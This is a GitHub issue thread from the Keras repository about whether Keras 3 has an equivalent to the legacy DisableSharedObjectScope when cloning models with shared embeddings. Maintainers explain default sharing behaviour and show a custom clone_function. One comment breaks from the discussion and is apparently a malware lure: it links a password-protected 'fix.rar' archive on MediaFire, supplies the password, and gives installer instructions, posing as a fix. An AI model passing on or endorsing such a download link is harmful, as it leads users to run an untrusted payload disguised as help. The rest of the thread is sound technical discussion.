### ISSUE TITLE
Is there a keras 3 equivalent to serialization.DisableSharedObjectScope()?

### ISSUE THREAD

**Issue by markomitos** [keras-team/keras#20172]
I am trying to add support for keras 3 to TensorFlow Federated and I need to check whether there was shared embeddings between layers when cloning a model and if that is the case to raise an error. Here is the code in question:
 https://github.com/google-parfait/tensorflow-federated/blob/523c129676236f7060fafb95b2a8fed683a5e519/tensorflow_federated/python/learning/models/functional.py#L502 

Is there something similar to this legacy function in tf_keras in keras 3?
https://github.com/keras-team/tf-keras/blob/c5f97730b2e495f5f56fc2267d22504075e46337/tf_keras/models/cloning.py#L525

**Comment by mehtamansi29** [comment]
Hi @markomitos -

In keras3 DisableSharedObjectScope() class is already created but not used while cloning the model.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by fchollet** [comment]
What currently happens if you try to clone a model that contains shared embeddings?

**Comment by markomitos** [comment]
Currently the test fails as the expected error was not raised, where as in the keras 2 version of the code it is caught and raised here: 
https://github.com/google-parfait/tensorflow-federated/blob/523c129676236f7060fafb95b2a8fed683a5e519/tensorflow_federated/python/learning/models/functional.py#L504

The test in mentioned is similar to this test, just using keras 3 instead of keras 2:
https://github.com/google-parfait/tensorflow-federated/blob/523c129676236f7060fafb95b2a8fed683a5e519/tensorflow_federated/python/learning/models/functional_test.py#L977

**Comment by divyashreepathihalli** [comment]
@markomitos  - 
Looks like `clone_model`, does extra surgery that is incompatible with shared objects. The [DisableSharedObjectScope](https://github.com/keras-team/keras/blob/3cc4d44df0d9d2cc0766c9a36ddc9cc0f20e9f3d/keras/src/legacy/saving/serialization.py#L52) is designed to be used with `clone_model`- it disables shared object handling.

**Comment by fchollet** [comment]
> It clones like nothing happened and continues with the test. Is there a way to check if the layers still contain a shared embedding, or is it not even a problem in the new keras version?

You can test layer equality in the new model to see if the embedding layer is shared.

> or is it not even a problem in the new keras version?

By default, if you have a shared layer in a model, the new layer will also be shared in the cloned version of the model.

If you want to change that behavior, you can! For instance if you want the new layer to be *duplicated* in the cloned model instead of shared, you can do that easily. Just pass a custom `clone_function` argument to `clone_model`.

Example:

```python
def clone_function(layer):
        config = layer.get_config()
        return layer.__class__.from_config(config)

    new_model = clone_model(model, clone_function=clone_function)
```
